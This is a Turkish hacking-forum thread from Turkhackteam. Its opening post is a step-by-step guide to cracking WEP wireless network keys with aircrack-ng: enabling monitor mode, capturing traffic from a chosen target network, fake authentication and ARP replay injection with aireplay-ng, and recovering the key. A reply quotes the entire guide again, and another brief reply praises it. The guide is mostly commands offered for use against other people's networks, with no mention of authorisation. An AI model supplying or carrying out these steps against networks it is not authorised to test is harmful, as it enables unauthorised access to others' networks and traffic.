[DR4K0L0L] WEP Kablosuz Ağları Nasıl Kırılır ?

DR4K0L0L

Katılımcı Üye
24 Şub 2016
891
1
WEP'in açılımı, "Wired Equivalent Privacy"dir. Bildiğiniz gibi, Wpa, Wpa2, Wep gibi şifreleme mekanizmaları sinyalleri şifreli biçimde gönderir. Ve yine bildiğiniz gibi, insanların kablosuz ağlarını korumaları için bir güvenlik önlemine ihtiyaçları vardır. Bu şifreleme mekanizmaları, bu yüzden vardır. WEP şifrelemesine sahip ağlar, kolayca istismar edilebilir düzeydedir. Bir engel ile karşılaşmadığınız takdirde, işe yarayacaktır.

(Konuyu açma sebebim. Birisi Phishing yöntemi ile WEP şifrelemesini kırmayı göstermişti. Ben de Phishing olmadan kırma yöntemini göstermek istedim. Bulunduğum bölgede WEP ağı olmadığı için resimli anlatım yapamayacağım.)

Öncelikle, eğer monitör modunu etkinleştirmediyseniz, etkinleştirmeniz gereklidir:
Kod:
airmon-ng start wlan0
wlan0 kısmına arayüzünüzün adını girmelisiniz. "ifconfig" yardımı ile öğrenebilirsiniz.

Daha sonra, bir hedef belirlemeliyiz:
Kod:
airodump-ng wlan0mon
Yazdığımız zaman, karşımıza sinyali çeken ağların bilgileri çıkacaktır. Buradan, bize uygun olan WEP şifrelemeli ağı seçiyoruz:

Kod:
airodump-ng --bssid AğınBSSIDi -c KanalNumarası -w herhangibirdosyaismi wlan0mon

Burada;

--bssid = Hedef ağımızın BSSID numarasını giriyoruz.
-c = Hedef ağımızın kanalını giriyoruz. Channel olarak belirtilir.
-w = Gelen - giden bağlantıları bir dosyaya yazması için kullanıyoruz.
wlan0mon = Bu da, airmon-ng de start wlan0 yaptığımda ortaya çıkan monitör modunun ismi. Bu sizde değişik olabilir. Genel olarak mon0 olarak geçer. "ifconfig" ile bakabilirsiniz. Ya da airmon-ng komudu ile...

Şimdi ise yazılımımız çalıştı ve bağlantıları dosyaya yazmaya başladı. 10 - 15 dakika bekleyin ve "Ctrl + c" yaparak işlemi sonlandırın. Bize, STATION numarası gerekli. Bunun için aireplay aracını kullanarak "Authentication" paketi göndereceğiz:
Kod:
aireplay-ng --fakeauth 0 -a WepAğınınBSSID --ignore-negative-one wlan0mon

Bunu yazdığımızda STATION kısmını göreceğiz.

Şimdi, tekrar aireplay aracına ihtiyacımız var:

Kod:
aireplay-ng --fakeauth 0 -a WepAğınınBSSID -h STATIONnumarası --ignore-negative-one wlan0mon

Şimdi, STATION nedir ? Diyebilirsiniz:

STATION, makinenin MAC adresidir.

Şimdi, yine aireplay aracını kullanacağız:

Kod:
aireplay-ng --arpreplay -b WepAğınınBSSID -h STATIONnumarası --ignore-negative-one wlan0mon

Bunu kullandığımızda, hedefe ARP paketleri (--arpreplay) gönderiyoruz. Böylece, paket topluyoruz. Bir 15 - 20 saniye bekleyin.

Şimdi ise, Aircrack aracını kullanarak WEP keyini bulmaya çalışacağız:
Kod:
aircrack-ng dosyaismi.cap
dosyaismi yerine, bağlantıları dinlerken belirttiğiniz dosya ismini (Benim herhangibirdosyaismi idi) bularak, onun adını girmeniz gereklidir. Örneğin, herhangibirdosyaismi-01.cap (Ben herhangibirdosyaismi şeklinde belirttiğim için) şeklinde. Yine de onu kaydettiğiniz yere bakıp bularak bakabilirsiniz. (Root klasöründe olabilir. Eğer bulamazsanız "locate" komudunu kullanınız.)

Bunu yaptığımızda, Aircrack şifre kırma işlemine başlıyor. Bir süre sonra, "KEY FOUND! [ AA:BB:CC:DD:EE ]" şeklinde çıktı, diyelim. O halde şifremiz, "AABBCCDDEE" olacaktır. Orada çıkan key'in içerisindeki ':'leri kaldırın.

Bunun gibi bir çok yöntem mevcut. Araştırarak elde edebilirsiniz...
 
Son düzenleme:

BCAllame

Üye
19 Nis 2016
61
0
Wep ile şifrelenen çok wi-fi yoktur sanırım wpa2 gibi yöntemlerle şifreleniyorlar ama eline sağlık yararlı konu
 

Samir007

Katılımcı Üye
31 Ocak 2016
290
0
WEP'in açılımı, "Wired Equivalent Privacy"dir. Bildiğiniz gibi, Wpa, Wpa2, Wep gibi şifreleme mekanizmaları sinyalleri şifreli biçimde gönderir. Ve yine bildiğiniz gibi, insanların kablosuz ağlarını korumaları için bir güvenlik önlemine ihtiyaçları vardır. Bu şifreleme mekanizmaları, bu yüzden vardır. WEP şifrelemesine sahip ağlar, kolayca istismar edilebilir düzeydedir. Bir engel ile karşılaşmadığınız takdirde, işe yarayacaktır.

(Konuyu açma sebebim. Birisi Phishing yöntemi ile WEP şifrelemesini kırmayı göstermişti. Ben de Phishing olmadan kırma yöntemini göstermek istedim. Bulunduğum bölgede WEP ağı olmadığı için resimli anlatım yapamayacağım.)

Öncelikle, eğer monitör modunu etkinleştirmediyseniz, etkinleştirmeniz gereklidir:
Kod:
airmon-ng start wlan0
wlan0 kısmına arayüzünüzün adını girmelisiniz. "ifconfig" yardımı ile öğrenebilirsiniz.

Daha sonra, bir hedef belirlemeliyiz:
Kod:
airodump-ng wlan0mon
Yazdığımız zaman, karşımıza sinyali çeken ağların bilgileri çıkacaktır. Buradan, bize uygun olan WEP şifrelemeli ağı seçiyoruz:

Kod:
airodump-ng --bssid AğınBSSIDi -c KanalNumarası -w herhangibirdosyaismi wlan0mon
Burada;

--bssid = Hedef ağımızın BSSID numarasını giriyoruz.
-c = Hedef ağımızın kanalını giriyoruz. Channel olarak belirtilir.
-w = Gelen - giden bağlantıları bir dosyaya yazması için kullanıyoruz.
wlan0mon = Bu da, airmon-ng de start wlan0 yaptığımda ortaya çıkan monitör modunun ismi. Bu sizde değişik olabilir. Genel olarak mon0 olarak geçer. "ifconfig" ile bakabilirsiniz. Ya da airmon-ng komudu ile...

Şimdi ise yazılımımız çalıştı ve bağlantıları dosyaya yazmaya başladı. Bize, STATION numarası gerekli. Bunun için aireplay aracını kullanarak "Authentication" paketi göndereceğiz:
Kod:
aireplay-ng --fakeauth 0 -a WepAğınınBSSID --ignore-negative-one wlan0mon
Bunu yazdığımızda STATION kısmını göreceğiz.

Şimdi, tekrar aireplay aracına ihtiyacımız var:

Kod:
aireplay-ng --fakeauth 0 -a WepAğınınBSSID -h STATIONnumarası --ignore-negative-one wlan0mon
Şimdi, STATION nedir ? Diyebilirsiniz:

STATION, makinenin MAC adresidir.

Şimdi, yine aireplay aracını kullanacağız:

Kod:
aireplay-ng --arpreplay -b WepAğınınBSSID -h STATIONnumarası --ignore-negative-one wlan0mon
Bunu kullandığımızda, hedefe ARP paketleri (--arpreplay) gönderiyoruz. Böylece, paket topluyoruz. Bir 15 - 20 saniye bekleyin.

Şimdi ise, Aircrack aracını kullanarak WEP keyini bulmaya çalışacağız:
Kod:
aircrack-ng dosyaismi.cap
dosyaismi yerine, bağlantıları dinlerken belirttiğiniz dosya ismini (Benim herhangibirdosyaismi idi) bularak, onun adını girmeniz gereklidir. Örneğin, herhangibirdosyaismi-01.cap (Ben herhangibirdosyaismi şeklinde belirttiğim için) şeklinde. Yine de onu kaydettiğiniz yere bakıp bularak bakabilirsiniz. (Root klasöründe olabilir. Eğer bulamazsanız "locate" komudunu kullanınız.)

Bunu yaptığımızda, Aircrack şifre kırma işlemine başlıyor. Bir süre sonra, "KEY FOUND! [ AA:BB:CC:DD:EE ]" şeklinde çıktı, diyelim. O halde şifremiz, "AABBCCDDEE" olacaktır. Orada çıkan key'in içerisindeki ':'leri kaldırın.

Bunun gibi bir çok yöntem mevcut. Araştırarak elde edebilirsiniz...

Linux icinmi ?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.